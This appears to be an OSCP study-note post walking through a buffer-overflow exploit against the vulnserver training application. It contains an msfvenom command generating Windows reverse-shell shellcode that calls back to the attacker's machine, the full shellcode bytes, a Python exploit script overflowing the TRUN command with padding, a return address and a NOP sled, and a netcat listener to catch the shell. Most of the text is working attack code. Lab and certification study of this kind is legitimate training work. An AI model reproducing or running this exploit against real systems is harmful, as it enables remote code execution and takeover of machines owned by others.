OSCP Security Technology - Generating Shellcode& Gaining Root
OSCP Security Technology - Generating Shellcode& Gaining Root
Generating shellcode.(Note: LHOST is Kali Linux's IP)
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 EXITFUNC=thread -f c -a x86 --platform windows -b "\x00"
"\xda\xcd\xd9\x74\x24\xf4\xbf\x1e\xa7\x4b\x98\x5a\x2b\xc9\xb1"
"\x52\x31\x7a\x17\x83\xc2\x04\x03\x64\xb4\xa9\x6d\x64\x52\xaf"
"\x8e\x94\xa3\xd0\x07\x71\x92\xd0\x7c\xf2\x85\xe0\xf7\x56\x2a"
"\x8a\x5a\x42\xb9\xfe\x72\x65\x0a\xb4\xa4\x48\x8b\xe5\x95\xcb"
"\x0f\xf4\xc9\x2b\x31\x37\x1c\x2a\x76\x2a\xed\x7e\x2f\x20\x40"
"\x6e\x44\x7c\x59\x05\x16\x90\xd9\xfa\xef\x93\xc8\xad\x64\xca"
"\xca\x4c\xa8\x66\x43\x56\xad\x43\x1d\xed\x05\x3f\x9c\x27\x54"
"\xc0\x33\x06\x58\x33\x4d\x4f\x5f\xac\x38\xb9\xa3\x51\x3b\x7e"
"\xd9\x8d\xce\x64\x79\x45\x68\x40\x7b\x8a\xef\x03\x77\x67\x7b"
"\x4b\x94\x76\xa8\xe0\xa0\xf3\x4f\x26\x21\x47\x74\xe2\x69\x13"
"\x15\xb3\xd7\xf2\x2a\xa3\xb7\xab\x8e\xa8\x5a\xbf\xa2\xf3\x32"
"\x0c\x8f\x0b\xc3\x1a\x98\x78\xf1\x85\x32\x16\xb9\x4e\x9d\xe1"
"\xbe\x64\x59\x7d\x41\x87\x9a\x54\x86\xd3\xca\xce\x2f\x5c\x81"
"\x0e\xcf\x89\x06\x5e\x7f\x62\xe7\x0e\x3f\xd2\x8f\x44\xb0\x0d"
"\xaf\x67\x1a\x26\x5a\x92\xcd\x89\x33\x9e\x15\x62\x46\x9e\x34"
"\x2e\xcf\x78\x5c\xde\x99\xd3\xc9\x47\x80\xaf\x68\x87\x1e\xca"
"\xab\x03\xad\x2b\x65\xe4\xd8\x3f\x12\x04\x97\x1d\xb5\x1b\x0d"
"\x09\x59\x89\xca\xc9\x14\xb2\x44\x9e\x71\x04\x9d\x4a\x6c\x3f"
"\x37\x68\x6d\xd9\x70\x28\xaa\x1a\x7e\xb1\x3f\x26\xa4\xa1\xf9"
"\xa7\xe0\x95\x55\xfe\xbe\x43\x10\xa8\x70\x3d\xca\x07\xdb\xa9"
"\x8b\x6b\xdc\xaf\x93\xa1\xaa\x4f\x25\x1c\xeb\x70\x8a\xc8\xfb"
"\x09\xf6\x68\x03\xc0\xb2\x89\xe6\xc0\xce\x21\xbf\x81\x72\x2c"
"\x40\x7c\xb0\x49\xc3\x74\x49\xae\xdb\xfd\x4c\xea\x5b\xee\x3c"
"\x63\x0e\x10\x92\x84\x1b"
Write the exploit script.
nano exploit.py
chmod 777 exploit.py
#!/usr/bin/python
import socket
import sys
exploit = (
"\xda\xcd\xd9\x74\x24\xf4\xbf\x1e\xa7\x4b\x98\x5a\x2b\xc9\xb1"
"\x52\x31\x7a\x17\x83\xc2\x04\x03\x64\xb4\xa9\x6d\x64\x52\xaf"
"\x8e\x94\xa3\xd0\x07\x71\x92\xd0\x7c\xf2\x85\xe0\xf7\x56\x2a"
"\x8a\x5a\x42\xb9\xfe\x72\x65\x0a\xb4\xa4\x48\x8b\xe5\x95\xcb"
"\x0f\xf4\xc9\x2b\x31\x37\x1c\x2a\x76\x2a\xed\x7e\x2f\x20\x40"
"\x6e\x44\x7c\x59\x05\x16\x90\xd9\xfa\xef\x93\xc8\xad\x64\xca"
"\xca\x4c\xa8\x66\x43\x56\xad\x43\x1d\xed\x05\x3f\x9c\x27\x54"
"\xc0\x33\x06\x58\x33\x4d\x4f\x5f\xac\x38\xb9\xa3\x51\x3b\x7e"
"\xd9\x8d\xce\x64\x79\x45\x68\x40\x7b\x8a\xef\x03\x77\x67\x7b"
"\x4b\x94\x76\xa8\xe0\xa0\xf3\x4f\x26\x21\x47\x74\xe2\x69\x13"
"\x15\xb3\xd7\xf2\x2a\xa3\xb7\xab\x8e\xa8\x5a\xbf\xa2\xf3\x32"
"\x0c\x8f\x0b\xc3\x1a\x98\x78\xf1\x85\x32\x16\xb9\x4e\x9d\xe1"
"\xbe\x64\x59\x7d\x41\x87\x9a\x54\x86\xd3\xca\xce\x2f\x5c\x81"
"\x0e\xcf\x89\x06\x5e\x7f\x62\xe7\x0e\x3f\xd2\x8f\x44\xb0\x0d"
"\xaf\x67\x1a\x26\x5a\x92\xcd\x89\x33\x9e\x15\x62\x46\x9e\x34"
"\x2e\xcf\x78\x5c\xde\x99\xd3\xc9\x47\x80\xaf\x68\x87\x1e\xca"
"\xab\x03\xad\x2b\x65\xe4\xd8\x3f\x12\x04\x97\x1d\xb5\x1b\x0d"
"\x09\x59\x89\xca\xc9\x14\xb2\x44\x9e\x71\x04\x9d\x4a\x6c\x3f"
"\x37\x68\x6d\xd9\x70\x28\xaa\x1a\x7e\xb1\x3f\x26\xa4\xa1\xf9"
"\xa7\xe0\x95\x55\xfe\xbe\x43\x10\xa8\x70\x3d\xca\x07\xdb\xa9"
"\x8b\x6b\xdc\xaf\x93\xa1\xaa\x4f\x25\x1c\xeb\x70\x8a\xc8\xfb"
"\x09\xf6\x68\x03\xc0\xb2\x89\xe6\xc0\xce\x21\xbf\x81\x72\x2c"
"\x40\x7c\xb0\x49\xc3\x74\x49\xae\xdb\xfd\x4c\xea\x5b\xee\x3c"
"\x63\x0e\x10\x92\x84\x1b")
shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 32 + exploit
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect=s.connect(('192.168.2.21',9999))
s.send(('TRUN /.:/' + shellcode))
except:
print "check debugger"
s.close()
Run the vulnserver and then run the exploit script.
nc - nvlp 4444
./exploit.py
相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。